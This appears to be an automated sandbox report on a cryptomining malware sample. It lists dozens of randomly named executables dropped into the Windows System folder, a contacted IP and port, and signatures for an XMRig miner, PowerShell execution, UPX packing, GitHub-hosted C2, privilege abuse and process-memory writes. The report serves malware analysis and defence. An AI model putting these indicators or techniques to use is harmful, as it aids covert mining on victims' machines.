C:\Windows\System\zKVdiUu.exe

C:\Windows\System\RpfjxeM.exe

C:\Windows\System\RpfjxeM.exe

C:\Windows\System\mCoHELO.exe

C:\Windows\System\mCoHELO.exe

C:\Windows\System\imxGMza.exe

C:\Windows\System\imxGMza.exe

C:\Windows\System\ivWdNKk.exe

C:\Windows\System\ivWdNKk.exe

C:\Windows\System\FMYbwAn.exe

C:\Windows\System\FMYbwAn.exe

C:\Windows\System\PdVWiHR.exe

C:\Windows\System\PdVWiHR.exe

C:\Windows\System\Shtthlm.exe

C:\Windows\System\Shtthlm.exe

C:\Windows\System\wmJkwXD.exe

C:\Windows\System\wmJkwXD.exe

C:\Windows\System\HQFlnXs.exe

C:\Windows\System\HQFlnXs.exe

C:\Windows\System\BIhkjcI.exe

C:\Windows\System\BIhkjcI.exe

C:\Windows\System\WSZshhV.exe

C:\Windows\System\WSZshhV.exe

C:\Windows\System\yiMMlBH.exe

C:\Windows\System\yiMMlBH.exe

C:\Windows\System\PmBKvxU.exe

C:\Windows\System\PmBKvxU.exe

C:\Windows\System\btwrOZF.exe

C:\Windows\System\btwrOZF.exe

C:\Windows\System\Phvktqd.exe

C:\Windows\System\Phvktqd.exe

C:\Windows\System\WqLgCEl.exe

C:\Windows\System\WqLgCEl.exe

C:\Windows\System\UDtduwa.exe

C:\Windows\System\UDtduwa.exe

C:\Windows\System\veSTUSe.exe

C:\Windows\System\veSTUSe.exe

C:\Windows\System\TYNSKmB.exe

C:\Windows\System\TYNSKmB.exe

C:\Windows\System\HkcmKQd.exe

C:\Windows\System\HkcmKQd.exe

C:\Windows\System\pOsQfvj.exe

C:\Windows\System\pOsQfvj.exe

C:\Windows\System\vJnOZSn.exe

C:\Windows\System\vJnOZSn.exe

C:\Windows\System\CjnjVQz.exe

C:\Windows\System\CjnjVQz.exe

C:\Windows\System\aODhDBJ.exe

C:\Windows\System\aODhDBJ.exe

C:\Windows\System\AMUbJzp.exe

C:\Windows\System\AMUbJzp.exe

C:\Windows\System\tcPzylo.exe

C:\Windows\System\tcPzylo.exe

C:\Windows\System\dxVrzkS.exe

C:\Windows\System\dxVrzkS.exe

C:\Windows\System\jiRLIxJ.exe

C:\Windows\System\jiRLIxJ.exe

C:\Windows\System\XCiiUqk.exe

C:\Windows\System\XCiiUqk.exe

C:\Windows\System\ZTOKSwt.exe

C:\Windows\System\ZTOKSwt.exe

C:\Windows\System\mPSYYvs.exe

C:\Windows\System\mPSYYvs.exe

C:\Windows\System\LrHwKTG.exe

C:\Windows\System\LrHwKTG.exe

C:\Windows\System\UfUwOST.exe

C:\Windows\System\UfUwOST.exe

C:\Windows\System\kqcrGiD.exe

C:\Windows\System\kqcrGiD.exe

C:\Windows\System\StzNyMV.exe

C:\Windows\System\StzNyMV.exe

C:\Windows\System\EyFRviF.exe

C:\Windows\System\EyFRviF.exe

C:\Windows\System\wkSYMMh.exe

C:\Windows\System\wkSYMMh.exe

C:\Windows\System\uFpOjwr.exe

C:\Windows\System\uFpOjwr.exe

C:\Windows\System\wlrcMmV.exe

C:\Windows\System\wlrcMmV.exe

C:\Windows\System\bkWMrSv.exe

C:\Windows\System\bkWMrSv.exe

C:\Windows\System\fHHJiLc.exe

C:\Windows\System\fHHJiLc.exe

C:\Windows\System\kknhfls.exe

C:\Windows\System\kknhfls.exe

C:\Windows\System\qdRZKkX.exe

C:\Windows\System\qdRZKkX.exe

C:\Windows\System\rEdQCfj.exe

C:\Windows\System\rEdQCfj.exe

C:\Windows\System\dhNwrML.exe

C:\Windows\System\dhNwrML.exe

C:\Windows\System\ENPZDUu.exe

C:\Windows\System\ENPZDUu.exe

C:\Windows\System\PUMKHvC.exe

C:\Windows\System\PUMKHvC.exe

C:\Windows\System\MQWJnpu.exe

C:\Windows\System\MQWJnpu.exe

C:\Windows\System\nJbDPBi.exe

C:\Windows\System\nJbDPBi.exe

C:\Windows\System\lJFIXBm.exe

C:\Windows\System\lJFIXBm.exe

C:\Windows\System\zbZFWEz.exe

C:\Windows\System\zbZFWEz.exe

C:\Windows\System\encYjhr.exe

C:\Windows\System\encYjhr.exe

C:\Windows\System\UJWKaOq.exe

C:\Windows\System\UJWKaOq.exe

C:\Windows\System\qguldyh.exe

C:\Windows\System\qguldyh.exe

C:\Windows\System\lhXGTIP.exe

C:\Windows\System\lhXGTIP.exe

C:\Windows\System\AjKsjoL.exe

C:\Windows\System\AjKsjoL.exe

C:\Windows\System\BViJDFp.exe

C:\Windows\System\BViJDFp.exe

C:\Windows\System\HxQDPfl.exe

C:\Windows\System\HxQDPfl.exe

C:\Windows\System\TZdFcqZ.exe

C:\Windows\System\TZdFcqZ.exe

C:\Windows\System\aXZaTmB.exe

C:\Windows\System\aXZaTmB.exe

C:\Windows\System\jHBrgIu.exe

C:\Windows\System\jHBrgIu.exe

C:\Windows\System\HZyKXDY.exe

C:\Windows\System\HZyKXDY.exe

C:\Windows\System\fysBlNG.exe

C:\Windows\System\fysBlNG.exe

C:\Windows\System\IrArVTi.exe

C:\Windows\System\IrArVTi.exe

C:\Windows\System\jwdJSfa.exe

C:\Windows\System\jwdJSfa.exe

C:\Windows\System\zOextNy.exe

C:\Windows\System\zOextNy.exe

C:\Windows\System\KxbuxhT.exe

C:\Windows\System\KxbuxhT.exe

C:\Windows\System\AKSqrVh.exe

C:\Windows\System\AKSqrVh.exe

C:\Windows\System\jUNWVrV.exe

C:\Windows\System\jUNWVrV.exe

C:\Windows\System\SZiwvTX.exe

C:\Windows\System\SZiwvTX.exe

C:\Windows\System\MGoUuOE.exe

C:\Windows\System\MGoUuOE.exe

C:\Windows\System\FXshdTo.exe

C:\Windows\System\FXshdTo.exe

C:\Windows\System\MUHGGfT.exe

C:\Windows\System\MUHGGfT.exe

C:\Windows\System\owrrATT.exe

C:\Windows\System\owrrATT.exe

C:\Windows\System\jjTBZOM.exe

C:\Windows\System\jjTBZOM.exe

C:\Windows\System\aHlmSKT.exe

C:\Windows\System\aHlmSKT.exe

C:\Windows\System\aqxUzIO.exe

C:\Windows\System\aqxUzIO.exe

C:\Windows\System\HxWCTWx.exe

C:\Windows\System\HxWCTWx.exe

C:\Windows\System\iJRudAb.exe

C:\Windows\System\iJRudAb.exe

C:\Windows\System\qOKnUGh.exe

C:\Windows\System\qOKnUGh.exe

C:\Windows\System\SoRBASn.exe

C:\Windows\System\SoRBASn.exe

C:\Windows\System\tyFNKmD.exe

C:\Windows\System\tyFNKmD.exe

C:\Windows\System\piJeNFS.exe

C:\Windows\System\piJeNFS.exe

C:\Windows\System\YdkFwze.exe

C:\Windows\System\YdkFwze.exe

C:\Windows\System\ihBOruC.exe

C:\Windows\System\ihBOruC.exe

C:\Windows\System\QisgCwR.exe

C:\Windows\System\QisgCwR.exe

C:\Windows\System\UyLdlWO.exe

C:\Windows\System\UyLdlWO.exe

C:\Windows\System\STHukUT.exe

C:\Windows\System\STHukUT.exe

C:\Windows\System\RlsGoiS.exe

C:\Windows\System\RlsGoiS.exe

C:\Windows\System\bfhovFx.exe

C:\Windows\System\bfhovFx.exe

C:\Windows\System\paDguvi.exe

C:\Windows\System\paDguvi.exe

C:\Windows\System\uRuwaQm.exe

C:\Windows\System\uRuwaQm.exe

C:\Windows\System\MHCdPlX.exe

C:\Windows\System\MHCdPlX.exe

C:\Windows\System\vFQYlqh.exe

C:\Windows\System\vFQYlqh.exe

C:\Windows\System\BypKAHT.exe

C:\Windows\System\BypKAHT.exe

C:\Windows\System\nqkJhRp.exe

C:\Windows\System\nqkJhRp.exe

C:\Windows\System\RohlviV.exe

C:\Windows\System\RohlviV.exe

C:\Windows\System\TDDsTKA.exe

C:\Windows\System\TDDsTKA.exe

C:\Windows\System\jUoeVLA.exe

C:\Windows\System\jUoeVLA.exe

C:\Windows\System\iCnTNfj.exe

C:\Windows\System\iCnTNfj.exe

C:\Windows\System\BQxHefv.exe

C:\Windows\System\BQxHefv.exe

C:\Windows\System\sPEGsnU.exe

C:\Windows\System\sPEGsnU.exe

C:\Windows\System\ndVTXjj.exe

C:\Windows\System\ndVTXjj.exe

C:\Windows\System\WRWhCXN.exe

C:\Windows\System\WRWhCXN.exe

C:\Windows\System\arVDvYk.exe

C:\Windows\System\arVDvYk.exe

C:\Windows\System\jjwsagw.exe

C:\Windows\System\jjwsagw.exe

C:\Windows\System\uYNAuBc.exe

C:\Windows\System\uYNAuBc.exe

C:\Windows\System\DrcGRBv.exe

C:\Windows\System\DrcGRBv.exe

C:\Windows\System\vdvwPRv.exe

C:\Windows\System\vdvwPRv.exe

C:\Windows\System\xFuIbyn.exe

C:\Windows\System\xFuIbyn.exe

C:\Windows\System\cxTiyyp.exe

C:\Windows\System\cxTiyyp.exe

C:\Windows\System\jmPKSmV.exe

C:\Windows\System\jmPKSmV.exe

C:\Windows\System\xMVRtSK.exe

C:\Windows\System\xMVRtSK.exe

C:\Windows\System\MBNYFDl.exe

C:\Windows\System\MBNYFDl.exe

C:\Windows\System\ytVyHoN.exe

C:\Windows\System\ytVyHoN.exe

C:\Windows\System\RlRYYSx.exe

C:\Windows\System\RlRYYSx.exe

C:\Windows\System\lnCgkqp.exe

C:\Windows\System\lnCgkqp.exe

C:\Windows\System\rCBxNkJ.exe

C:\Windows\System\rCBxNkJ.exe

C:\Windows\System\bDdPBmn.exe

C:\Windows\System\bDdPBmn.exe

C:\Windows\System\GprWXlG.exe

C:\Windows\System\GprWXlG.exe

C:\Windows\System\oqhMUan.exe

C:\Windows\System\oqhMUan.exe

C:\Windows\System\RudYePV.exe

C:\Windows\System\RudYePV.exe

C:\Windows\System\acKMzko.exe

C:\Windows\System\acKMzko.exe

C:\Windows\System\htIPmxl.exe

C:\Windows\System\htIPmxl.exe

C:\Windows\System\GAyUzNr.exe

C:\Windows\System\GAyUzNr.exe

C:\Windows\System\WcgkYuo.exe

C:\Windows\System\WcgkYuo.exe

C:\Windows\System\ZftBJDX.exe

C:\Windows\System\ZftBJDX.exe

C:\Windows\System\ksHLYpT.exe

C:\Windows\System\ksHLYpT.exe

C:\Windows\System\wTbQnCT.exe

C:\Windows\System\wTbQnCT.exe

C:\Windows\System\VEhnuzB.exe

C:\Windows\System\VEhnuzB.exe

C:\Windows\System\VZAcbRD.exe

C:\Windows\System\VZAcbRD.exe

C:\Windows\System\UjNORYx.exe

C:\Windows\System\UjNORYx.exe

C:\Windows\System\JTPUUqr.exe

C:\Windows\System\JTPUUqr.exe

C:\Windows\System\XOaydxe.exe

C:\Windows\System\XOaydxe.exe

C:\Windows\System\XSxvCkm.exe

C:\Windows\System\XSxvCkm.exe

C:\Windows\System\BXASTau.exe

C:\Windows\System\BXASTau.exe

C:\Windows\System\gMRJxRQ.exe

C:\Windows\System\gMRJxRQ.exe

C:\Windows\System\bqaoMnf.exe

C:\Windows\System\bqaoMnf.exe

C:\Windows\System\vEFrZtA.exe

C:\Windows\System\vEFrZtA.exe

C:\Windows\System\GtjkHUj.exe

C:\Windows\System\GtjkHUj.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp

Files


Analysis: behavioral2

Detonation Overview

Submitted

2024-06-14 06:38

Reported

2024-06-14 06:41

Platform

win10v2004-20240508-en

Max time kernel

125s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db-shm C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db-wal C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A

Drops file in Windows directory

Description Indicator Process Target

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\ExternalFeatureOverrides\officeclicktorun C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\TrustCenter\Experimentation C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\officeclicktorun C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\all\Overrides C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\Overrides C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\Overrides C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "1" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "2" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1168 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1168 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1168 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\qZzUIXb.exe
PID 1168 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\qZzUIXb.exe
PID 1168 wrote to memory of 5088 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\CLGaUgU.exe
PID 1168 wrote to memory of 5088 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\CLGaUgU.exe
PID 1168 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\tlgMtuF.exe
PID 1168 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\tlgMtuF.exe
PID 1168 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\JhQWmZm.exe
PID 1168 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\JhQWmZm.exe
PID 1168 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\EAdLWJi.exe
PID 1168 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\EAdLWJi.exe
PID 1168 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\NIVvdQi.exe
PID 1168 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\NIVvdQi.exe
PID 1168 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\vgMmQOg.exe
PID 1168 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\vgMmQOg.exe
PID 1168 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\hPrNWiK.exe
PID 1168 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\hPrNWiK.exe
PID 1168 wrote to memory of 3920 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\tBWjaiB.exe
PID 1168 wrote to memory of 3920 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\tBWjaiB.exe
PID 1168 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\KvLJruv.exe
PID 1168 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\KvLJruv.exe
PID 1168 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\UrQZfNg.exe
PID 1168 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\UrQZfNg.exe
PID 1168 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\ykwfmKT.exe
PID 1168 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\ykwfmKT.exe
PID 1168 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\dtzoVTf.exe
PID 1168 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\dtzoVTf.exe
PID 1168 wrote to memory of 4240 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\bbxCNhx.exe
PID 1168 wrote to memory of 4240 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\bbxCNhx.exe
PID 1168 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\fiucjns.exe
PID 1168 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\fiucjns.exe
PID 1168 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\uYnVAlZ.exe
PID 1168 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\uYnVAlZ.exe
PID 1168 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\RiphVXj.exe
PID 1168 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\RiphVXj.exe
PID 1168 wrote to memory of 4112 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\OUSSupJ.exe
PID 1168 wrote to memory of 4112 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\OUSSupJ.exe
PID 1168 wrote to memory of 3652 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\GttnjHZ.exe
PID 1168 wrote to memory of 3652 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\GttnjHZ.exe
PID 1168 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\NLQsayu.exe
PID 1168 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\NLQsayu.exe
PID 1168 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\zmwDvbJ.exe
PID 1168 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\zmwDvbJ.exe
PID 1168 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\YnuDTWR.exe
PID 1168 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\YnuDTWR.exe
